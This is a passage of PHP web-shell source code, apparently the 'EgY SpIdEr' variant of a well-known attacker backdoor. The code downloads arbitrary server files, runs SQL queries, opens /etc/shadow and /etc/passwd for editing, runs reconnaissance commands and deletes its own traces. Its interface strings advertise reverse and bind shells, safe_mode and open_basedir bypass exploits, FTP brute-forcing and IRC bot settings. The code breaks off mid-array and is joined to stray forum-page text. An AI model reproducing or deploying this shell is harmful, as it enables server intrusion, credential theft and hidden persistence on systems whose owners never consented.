if(isset($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))
{
if($file=moreread($_POST['d_name'])){ $filedump = $file; }
else if ($file=readzlib($_POST['d_name'])) { $filedump = $file; } else { err(1,$_POST['d_name']); $_POST['cmd']=""; }
if(!empty($_POST['cmd']))
{
@ob_clean();
$filename = @basename($_POST['d_name']);
$content_encoding=$mime_type='';
compress($filename,$filedump,$_POST['compress']);
if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }
header("Content-type: ".$mime_type);
header("Content-disposition: attachment; filename=\"".$filename."\";");
echo $filedump;
exit();
}
}
if(isset($_GET['1'])) { echo @phpinfo(); echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die(); }
if (isset($_POST['cmd']) && $_POST['cmd']=="db_query")
{
echo $head;
$sql = new my_sql();
$sql->db = $_POST['db'];
$sql->host = $_POST['db_server'];
$sql->port = $_POST['db_port'];
$sql->user = $_POST['mysql_l'];
$sql->pass = $_POST['mysql_p'];
$sql->base = $_POST['mysql_db'];
$querys = @explode(';',$_POST['db_query']);
echo '<body bgcolor=#e4e0d8>';
if(!$sql->connect()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't connect to SQL server</b></font></div>";
else
{
if(!empty($sql->base)&&!$sql->select_db()) echo "<div align=center><font face=Verdana size=-2 color=red><b>Can't select database</b></font></div>";
else
{
foreach($querys as $num=>$query)
{
if(strlen($query)>5)
{
echo "<font face=Verdana size=-2 color=green><b>Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."</b></font><br>";
switch($sql->query($query))
{
case '0':
echo "<table width=100%><tr><td><font face=Verdana size=-2>Error : <b>".$sql->error."</b></font></td></tr></table>";
break;
case '1':
if($sql->get_result())
{
echo "<table width=100%>";
foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);
$keys = @implode(" </b></font></td><td bgcolor=#333333><font face=Verdana size=-2><b> ", $sql->columns);
echo "<tr><td bgcolor=#333333><font face=Verdana size=-2><b> ".$keys." </b></font></td></tr>";
for($i=0;$i<$sql->num_rows;$i++)
{
foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);
$values = @implode(" </font></td><td><font face=Verdana size=-2> ",$sql->rows[$i]);
echo '<tr><td><font face=Verdana size=-2> '.$values.' </font></td></tr>';
}
echo "</table>";
}
break;
case '2':
$ar = $sql->affected_rows()?($sql->affected_rows()):('0');
echo "<table width=100%><tr><td><font face=Verdana size=-2>affected rows : <b>".$ar."</b></font></td></tr></table><br>";
break;
}
}
}
}
}
echo "<br><form name=form method=POST>";
echo in('hidden','db',0,$_POST['db']);
echo in('hidden','db_server',0,$_POST['db_server']);
echo in('hidden','db_port',0,$_POST['db_port']);
echo in('hidden','mysql_l',0,$_POST['mysql_l']);
echo in('hidden','mysql_p',0,$_POST['mysql_p']);
echo in('hidden','mysql_db',0,$_POST['mysql_db']);
echo in('hidden','cmd',0,'db_query');
echo "<div align=center>";
echo "<font face=Verdana size=-2><b>Base: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;\nSELECT * FROM user;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
echo "</form>";
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>"; die();
}
if(isset($_GET['12']))
{
@unlink(__FILE__);
}
if(isset($_GET['11']))
{
@unlink($tempdir.'bdpl');
@unlink($tempdir.'back');
@unlink($tempdir.'bd');
@unlink($tempdir.'bd.c');
@unlink($tempdir.'dp');
@unlink($tempdir.'dpc');
@unlink($tempdir.'dpc.c');
@unlink($tempdir.'prxpl');
@unlink($tempdir.'grep.txt');
}
if(isset($_GET['2']))
{
echo $head;
function U_value($value)
{
if ($value == '') return '<i>no value</i>';
if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
if ($value === null) return 'NULL';
if (@is_object($value)) $value = (array) $value;
if (@is_array($value))
{
@ob_start();
print_r($value);
$value = @ob_get_contents();
@ob_end_clean();
}
return U_wordwrap((string) $value);
}
function U_wordwrap($str)
{
$str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
}
if (@function_exists('ini_get_all'))
{
$r = '';
echo '<table width=100%>', '<tr><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Directive</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Local Value</b></div></font></td><td bgcolor=#333333><font face=Verdana size=-2 color=red><div align=center><b>Master Value</b></div></font></td></tr>';
foreach (@ini_get_all() as $key=>$value)
{
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
}
echo $r;
echo '</table>';
}
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['3']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>CPU</b></font></div></td></tr></table><table width=100%>';
$cpuf = @file("cpuinfo");
if($cpuf)
{
$c = @sizeof($cpuf);
for($i=0;$i<$c;$i++)
{
$info = @explode(":",$cpuf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['4']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2 color=red><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href='".$_SERVER['PHP_SELF']."'>BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['egy']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>EgY SpIdEr</b></font></div></td></tr></table><table width=100%>';
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b><div align="center">
<font face="tahoma" size="-2"><b>
<p align="center"> </p>
<p align="center">
<font style="FONT-WEIGHT: 500; FONT-SIZE: 100pt" face="Webdings" color="#800000">
<IFRAME WIDTH=100% HEIGHT=671 SRC="http://egyfree.org/about.htm"></IFRAME></font></p>
<p align="center"> </p>
<div id="n" align="center">
</div>
<p> </font></b></div>
</b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['news']))
{
echo $head;
echo '<table width=100%><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2 color=red><b>EgY SpIdEr</b></font></div></td></tr></table><table width=100%>';
$memf = @file("meminfo");
if($memf)
{
$c = sizeof($memf);
for($i=0;$i<$c;$i++)
{
$info = explode(":",$memf[$i]);
if($info[1]==""){ $info[1]="---"; }
$r .= '<tr><td>'.ws(3).'<font face=tahoma size=-2><b>'.trim($info[0]).'</b></font></td><td><font face=tahoma size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
}
echo $r;
}
else
{
echo '<tr><td>'.ws(3).'<div align=center><font face=tahoma size=-2><b><div align="center">
<font face="tahoma" size="-2"><b>
<p align="center"> </p>
<p align="center">
<font style="FONT-WEIGHT: 500; FONT-SIZE: 100pt" face="Webdings" color="#800000">
<IFRAME WIDTH=100% HEIGHT=671 SRC="http://egyfree.org/news.htm"></IFRAME></font></p>
<p align="center"> </p>
<div id="n" align="center">
</div>
<p> </font></b></div>
</b></font></div></td></tr>';
}
echo '</table>';
echo "<br><div align=center><font face=tahoma size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}

if(isset($_GET['5']))
{$_POST['cmd'] = 'systeminfo';}
if(isset($_GET['6']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/syslog.conf';}
if(isset($_GET['7']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/resolv.conf';}
if(isset($_GET['8']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/hosts';}
if(isset($_GET['9']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/shadow';}
if(isset($_GET['10']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/passwd';}
if(isset($_GET['13']))
{$_POST['cmd']='cat /proc/cpuinfo';}
if(isset($_GET['14']))
{$_POST['cmd']='cat /proc/version';}
if(isset($_GET['15']))
{$_POST['cmd'] = 'free';}
if(isset($_GET['16']))
{$_POST['cmd'] = 'dmesg(8)';}
if(isset($_GET['17']))
{$_POST['cmd'] = 'vmstat';}
if(isset($_GET['18']))
{$_POST['cmd'] = 'lspci';}
if(isset($_GET['19']))
{$_POST['cmd'] = 'lsdev';}
if(isset($_GET['20']))
{$_POST['cmd']='cat /proc/interrupts';}
if(isset($_GET['21']))
{$_POST['cmd'] = 'cat /etc/*realise';}
if(isset($_GET['22']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/issue.net';}
if(isset($_GET['23']))
{$_POST['cmd'] = 'lsattr -va';}
if(isset($_GET['24']))
{$_POST['cmd'] = 'w';}
if(isset($_GET['25']))
{$_POST['cmd'] = 'who';}
if(isset($_GET['26']))
{$_POST['cmd'] = 'uptime';}
if(isset($_GET['27']))
{$_POST['cmd'] = 'last -n 10';}
if(isset($_GET['28']))
{$_POST['cmd'] = 'ps -aux';}
if(isset($_GET['29']))
{$_POST['cmd'] = 'service --status-all';}
if(isset($_GET['30']))
{$_POST['cmd'] = 'ifconfig';}
if(isset($_GET['31']))
{$_POST['cmd'] = 'netstat -a';}
if(isset($_GET['32']))
{$_POST['cmd']='edit_file';$_POST['e_name'] = '/etc/fstab';}
if(isset($_GET['33']))
{$_POST['cmd'] = 'fdisk -l';}
if(isset($_GET['34']))
{$_POST['cmd'] = 'df -h';}

#if(isset($_GET['']))
# {$_POST['cmd'] = '';}

$lang=array(
'ar_text1' =>'ÇáÇãÑ ÇáãäÝÐ',
'ar_text2' =>'ÊäÝíÐ ÇáÇæÇãÑ Ýí ÇáÓíÑÝÑ',
'ar_text3' =>'ÇãÑ ÇáÊÔÛíá',
'ar_text4' =>'ãßÇä Úãáß ÇáÇä Úáì ÇáÓíÑÝÑ',
'ar_text5' =>'ÑÝÚ ãáÝ Çáì ÇáÓíÑÝÑ',
'ar_text6' =>'ãÓÇÑ ãáÝß',
'ar_text7' =>'ÇæÇãÑ ÌÇåÒå',
'ar_text8' =>'ÇÎÊÑ ÇáÇãÑ',
'ar_butt1' =>'ÊäÝíÐ',
'ar_butt2' =>'ÑÝÜÚ',
'ar_text9' =>'ÝÊÍ ÈæÑÊ Ýí ÇáÓíÑÝÑ Úáì /bin/bash',
'ar_text10'=>'ÈÜæÑÊ',
'ar_text11'=>'ÈÇÓæÑÏ ááÏÎæá',
'ar_butt3' =>'ÝÊÍ',
'ar_text12'=>'ÃÊÕÜÇá ÚÜßÓí',
'ar_text13'=>'ÇáÇí Èí',
'ar_text14'=>'ÇáãäÝÐ',
'ar_butt4' =>'ÃÊÜÕÇá',
'ar_text15'=>'ÓÍÈ ãáÝÇÊ Çáì ÇáÓíÑÝÑ',
'ar_text16'=>'Úä ØÑíÞ',
'ar_text17'=>'ÑÇÈØ ÇáãáÝ',
'ar_text18'=>'ãßÇä äÒæáå',
'ar_text19'=>'Exploits',
'ar_text20'=>'ÅÓÊÎÏã',
'ar_text21'=>'ÇáÇÓã ÇáÌÏíÏ',
'ar_text22'=>'ÇäÈæÈ ÇáÈíÇäÇÊ',
'ar_text23'=>'ÇáÈæÑÊ ÇáãÍáí',
'ar_text24'=>'ÇáÓíÑÝÑ ÇáÈÚíÏ',
'ar_text25'=>'ÇáãäÝÐ ÇáÈÚíÏ',
'ar_text26'=>'ÇÓÊÎÏã',
'ar_butt5' =>'ÊÔÛíá',
'ar_text28'=>'ÇáÚãá Ýí ÇáæÖÚ ÇáÇãä',
'ar_text29'=>'ããäæÚ ÇáÏÎæá',
'ar_butt6' =>'ÊÛíÑ',
'ar_text30'=>'ÚÑÖ ãáÝ',
'ar_butt7' =>'ÚÑÖ',
'ar_text31'=>'ÇáãáÝ ÛíÑ ãæÌæÏ',
'ar_text32'=>'ÊäÝíÐ ßæÏ php Úä ØÑíÞ ÏÇáå eval',
'ar_text33'=>'Test bypass open_basedir with cURL functions',
'ar_butt8' =>'ÇÎÊÈÇÑ',
'ar_text34'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå include',
'ar_text35'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå Mysql',
'ar_text36'=>'ÇáÞÇÚÏÉ . ÇáÌÏæá',
'ar_text37'=>'ÇÓã ÇáãÓÊÎÏã',
'ar_text38'=>'ßáãÉ ÇáãÑæÑ',
'ar_text39'=>'ÇáÞÇÚÏÉ',
'ar_text40'=>'äÓÎÉ ãä ÌÏÇæá ÇáÞÇÚÏÉ',
'ar_butt9' =>'äÓÎÉ',
'ar_text41'=>'ÍÝÙ ÇáäÓÎÉ Ýí',
'ar_text42'=>'ÊÚÏíá ÇáãáÝÇÊ',
'ar_text43'=>'ÇáãáÝ ÇáãÑÇÏ ÊÚÏíáå',
'ar_butt10'=>'ÍÝÙ',
'ar_text44'=>'áÇÊÓÊØíÚ ÇáÊÚÏíá Úáì åÐÇ ÇáãáÝ ÝÞØ ÊÞÑÃ',
'ar_text45'=>'Êã ÇáÍÝÙ',
'ar_text46'=>'ÚÑÖ phpinfo()',
'ar_text47'=>'ÑÄíÉ ÇáãÊÛíÑÇÊ Ýí php.ini',
'ar_text48'=>'ãÓÍ ãáÝÇÊ ÇáÜ temp',
'ar_butt11'=>'ÊÍÑíÑ ÇáãáÝ',
'ar_text49'=>'ãÓÍ ÇáÓßÑÈÊ ãä ÇáÓíÑÝÑ',
'ar_text50'=>'ÚÑÖ ãÚáæãÇÊ ÇáÐÇßÑÉ ÇáÑÆíÓíÉ',
'ar_text51'=>'ÚÑÖ ãÚáæãÇÊ ÇáÐÇßÑÉ',
'ar_text52'=>'ÈÍË äÕ',
'ar_text53'=>'Ýí ÇáãÓÇÑ',
'ar_text54'=>'ÈÍË Úä äÕ Ýí ÇáãáÝÇÊ',
'ar_butt12'=>'ÈÍË',
'ar_text55'=>'ÝÞØ Ýí ÇáãáÝÇÊ',
'ar_text56'=>'áÇíæÌÏ :(',
'ar_text57'=>'ÇäÔÇÁ/ãÓÍ ãáÝ/ãÌáÏ',
'ar_text58'=>'ÇáÇÓã',
'ar_text59'=>'ãáÝ',
'ar_text60'=>'ãÌáÏ',
'ar_butt13'=>'ÅäÔÇÁ /ãÓÍ',
'ar_text61'=>'Êã ÅäÔÇÁ ÇáãáÝ',
'ar_text62'=>'Êã ÅäÔÇÁ ÇáãÌáÏ',
'ar_text63'=>'Êã ãÓÍ ÇáãáÝ',
'ar_text64'=>'Êã ãÓÍ ÇáãÌáÏ',
'ar_butt65'=>'ÅäÔÇÁ',
'ar_text66'=>'ãÓÍ',
'ar_text67'=>'ÇáÊÕÑíÍ/ÇáãÓÊÎÏã/ÇáãÌãæÚÉ',
'ar_text68'=>'ÇãÑ',
'ar_text69'=>'ÅÓã ÇáãáÝ',
'ar_text70'=>'ÇáÊÕÑíÍ',
'ar_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
'ar_text72'=>'ÇáäÕ ÇáãÑÇÏ',
'ar_text73'=>'ÈÍË Ýí ÇáãÌáÏÇÊ',
'ar_text74'=>'ÈÍË Ýí ÇáãáÝÇÊ',
'ar_text75'=>'* you can use regexp',
'ar_text76'=>'ÇáÈÍË Úä äÕ Ýí ãáÝÇÊ ÈæÇÓØå find',
'ar_text80'=>'ÇáäæÚ',
'ar_text81'=>'ÇáÅÊÕÇáÇÊ',
'ar_text82'=>'ÞæÇÚÏ ÇáÈíÇäÇÊ',
'ar_text83'=>'ÊÔÛíá ÇãÑ ÇÓÊÚáÇã',
'ar_text84'=>'ÇÓÊÚáÇã ÞÇÚÏÉ',
'ar_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
'ar_text86'=>'ÊäÒíá ãáÝÇÊ ãä ÇáÓíÑÝÑ',
'ar_butt14'=>'ÊÍãíá',
'ar_text87'=>'ÊäÒíá ãáÝÇÊ ãä ÎÇÏã ÇáÇÝ Êí Èí',
'ar_text88'=>'ÓíÑÝÑ ÇáÇÝ Êí Èí:ÇáãäÝÐ',
'ar_text89'=>'ãáÝ Ýí ÇáÇÝ Êí Èí',
'ar_text90'=>'ÇáÊÍæíá Çáì',
'ar_text91'=>'ÇÑÔÝÉ',
'ar_text92'=>'ãä ÛíÑ ÇáÇÑÔÝÉ',
'ar_text93'=>'ÇáÇÝ Êí Èí',
'ar_text94'=>'ÊÎãíä ÇáÇÝ Êí Èí',
'ar_text95'=>'ÞÇÆãÉ ÇáãÓÊÎÏãíä',
'ar_text96'=>'áã íÓÊØÚ ÓÍÈ ÞÇÆãÉ ÇáãÓÊÎÏãíä',
'ar_text97'=>'Êã ÇáÝÍÕ: ',
'ar_text98'=>'Êã ÈäÌÇÍ: ',
'ar_text99'=>'* ÇÓÊÎÏã ÇÓãÇÁ ÇáãÓÊÎÏãíä Ýí ãáÝ /etc/passwd áÏÎæá ááÜ ftp',
'ar_text100'=>'ÇÑÓÇá ãáÝ Çáì ÎÇÏã ÇáÇÝ Êí Èí',
'ar_text101'=>'ÇÓÊÎÏã ÇáÇÓÇãí ãÚßæÓå áÊÎãíäåÇ',
'ar_text102'=>'ÎÏãÇÊ ÇáÈÑíÏ',
'ar_text103'=>'ÇÑÓÇá ÈÑíÏ',
'ar_text104'=>'ÇÑÓÇá ãáÝ Çáì ÇáÇíãíá',
'ar_text105'=>'Åáì',
'ar_text106'=>'ãÜä',
'ar_text107'=>'ÇáãæÖæÚ',
'ar_butt15'=>'ÅÑÓÇá',
'ar_text108'=>'ÇáÑÓÇáÉ',
'ar_text109'=>'ãÎÝí',
'ar_text110'=>'ÚÑÖ',
'ar_text111'=>'ÓíÑÝÑ ÞæÇÚÏ ÇáÈíÇäÇÊ : ÇáãäÝÐ',
'ar_text112'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ ÏÇáå mb_send_mail',
'ar_text113'=>'ÞÑÇÆÉ ãÍÊæì ÇáãÌáÏÇÊ Úä ØÑíÞ via imap_list',
'ar_text114'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ via imap_body',
'ar_text115'=>'ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ compress.zlib://',
'ar_text116'=>'äÓÎ ãä',
'ar_text117'=>'Çáì',
'ar_text118'=>'Êã äÓÎ ÇáãáÝ',
'ar_text119'=>'áÇíÓÊØíÚ ÇáäÓÎ',
'ar_err0'=>'ÎØÇÁ ! áÇíãßä ÇáßÊÇÈÉ Úáì åÐÇ ÇáãáÝ ',
'ar_err1'=>'ÎØÇÁ ! ÛíÑ ÞÇÏÑ Úáì ÞÑÇÆå åÐÇ ÇáãáÝ ',
'ar_err2'=>'ÎØÇÁ! áÇíãßä ÇáÇäÔÇÁ ',
'ar_err3'=>'ÎØÇÁ! ÛíÑ ÞÇÏÑ Úáì ÇáÇÊÕÇá ÈÇáÇÝ Êí Èí',
'ar_err4'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇáÏÎæá Çáì ÓíÑÝÑ ÇáÇÝ Êí Èí',
'ar_err5'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÊÛíÑ ÇáãÌáÏ Ýí ÇáÇÝ Êí Èí',
'ar_err6'=>'ÎØÇÁ ! áÇÊÓÊØíÚ ÇÑÓÇá ÑÓÇáå',
'ar_err7'=>'ÇáÈÑíÏ ÇÑÓá',
'ar_text200'=>'copy()ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ',
'ar_text202'=>'ãÓÇÑ ÇáãáÝ ÇáãÑÇÏ ÞÑÇÆÊå',
'ar_text300'=>'curl()ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ',
'ar_text203'=>'ini_restore()ÞÑÇÆÉ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ',
'ar_text204'=>'error_log()ÒÑÇÚå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå',
'ar_text205'=>'ÃÒÑÚ ÇáÔá Úáì åÐÇ ÇáãÓÇÑ',
'ar_text206'=>'ÞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏ',
'ar_text207'=>'ÞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏÇÊ Úä ØÑíÞ ËÛÑå reg_glob',
'ar_text208'=>'ÊäÝíÐ ÇáÇæÇãÑ Ýí ÇáæÖÚ ÇáÇãä Úä ØÑíÞ ÇáÏæÇá',
'ar_text209'=>'ÞÑÇÆå ãÍÊæíÇÊ ÇáãÌáÏÇÊ Úä ØÑíÞ ËÛÑå root',
'ar_text210'=>'Ýß ÊÔÝíÑ ÇáÒäÏ ',
'ar_text211'=>'::ÇÞÝÇá ÇáÓíÝ ãæÏ::',
'ar_text212'=>'php.ini ÇÞÝÇá ÇáÓíÝ ãæÏ Úä ØÑíÞ ÒÑÚ ãáÝ',
'ar_text213'=>'htacces ÅÞÝÇá ÇáãæÏ ÓßíæÑÊí Úä ØÑíÞ ÒÑÚ ãáÝ',
'ar_text214'=>'ÃÓã ÇáÇÏãä',
'ar_text215'=>'ÚäæÇä ÇáÓíÑÝÑ IRC ',
'ar_text216'=>'# ÃÓã ÇáÛÑÝå ãÚ',
'ar_text217'=>'ÇÓã ÇáÓíÑÝÑ ÇáãÎÊÑÞ',
'ar_text218'=>'áÅíÞÇÝ ÇáÓíÝ ãæÏ ini_restore ÒÑÚ ãáÝ íÍÊæí Úáì ËÛÑå',
'ar_text219'=>'ÓÍÈ ãáÝÇÊ Çáì ÇáÓíÑÝÑ æÊÛíÑ ÇÓãåÇ ÈÇáæÖÚ ÇáÇãä',
'ar_text220'=>'ÇÓÊÚÑÇÖ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå symlink ÇáÎØæå ÇáÇæáì',
'ar_text221'=>'ÖÛØ ÇáãáÝÇÊ áÊÍãíáåÇ ãä ÇáãæÞÚ(ÈÚÏ ÊÍãíáåÇ áÌåÇÒß ÛíÑ ÇãÊÏÇÏ ÇáãáÝ áÇãÊÏÇÏå ÇáÓÇÈÞ)1',
'ar_text222'=>'ÇÓÊÚÑÇÖ ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå symlink ÇáÎØæå ÇáËÇäíå',
'ar_text223'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ÇáÏæÇá',
'ar_text224'=>'PLUGIN ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑå ',
'ar_text143'=>'ÇáÊãÈ: ',
'ar_text65'=>'ÇäÔÇÁ',

'ar_text33'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
'ar_text34'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ include function',
'ar_text35'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ load file in mysql',
'ar_text85'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ commands execute via MSSQL server',
'ar_text112'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
'ar_text113'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, view dir list via imap_list() (PHP <= 5.1.2)',
'ar_text114'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, view file contest via imap_body() (PHP <= 5.1.2)',
'ar_text115'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode, copy file via copy(compress.zlib://) (PHP <= 4.4.2, 5.1.2)',
'ar_text116'=>'Copy from',
'ar_text117'=>'to',
'ar_text118'=>'File copied',
'ar_text119'=>'Cant copy file',
'ar_text120'=>'ÊÎØì ÇáÓíÝ ãæÏ È safe_mode via ini_restore (PHP <= 4.4.4, 5.1.6) by NST',
'ar_text121'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via fopen (PHP v4.4.0 memory leak) by NST',
'ar_text122'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via glob() (PHP <= 5.2.x)',
'ar_text123'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, read *.bzip file via [compress.bzip2://] (PHP <= 5.2.1)',
'ar_text124'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, add data to file via error_log(php://) (PHP <= 5.1.4, 4.4.2)',
'ar_text126'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via session_save_path[NULL-byte] (PHP <= 5.2.0)',
'ar_text127'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, add data to file via readfile(php://) (PHP <= 5.2.1, 4.4.4)',
'ar_text128'=>'Modify/Access file (touch)',
'ar_text129'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via fopen(srpath://) (PHP v5.2.0)',
'ar_text130'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, read *.zip file via [zip://] (PHP <= 5.2.1)',
'ar_text131'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view file contest via symlink() (PHP <= 5.2.1)',
'ar_text132'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, view dir list via symlink() (PHP <= 5.2.1)',
'ar_text133'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir, create file via session_save_path(TMPDIR) (PHP <= 5.2.4)',
'ar_err3'=>'Error! Can\'t connect to ftp',
'ar_err4'=>'Error! Can\'t login on ftp server',
'ar_err5'=>'Error! Can\'t change dir on ftp',
'ar_err6'=>'Error! Can\'t sent mail',
'ar_err7'=>'Mail send',
'ar_text1' =>'Executed command',
'ar_text2' =>'Execute command on server',
'ar_text33'=>'ÊÎØì ÇáÓíÝ ãæÏ È open_basedir with cURL functions(PHP <= 4.4.2, 5.1.4)',
'ar_text34'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ include function',
'ar_text35'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ load file in mysql',
'ar_text112'=>'ÞÑÇÆå ÇáãáÝÇÊ Úä ØÑíÞ ËÛÑÉ function mb_send_mail() (PHP <= 4.0-4.2.2, 5.x)',
'ar_text113'=>'ÊÎØì

Howdy, Stranger!

Top Posters

Who's Online (1)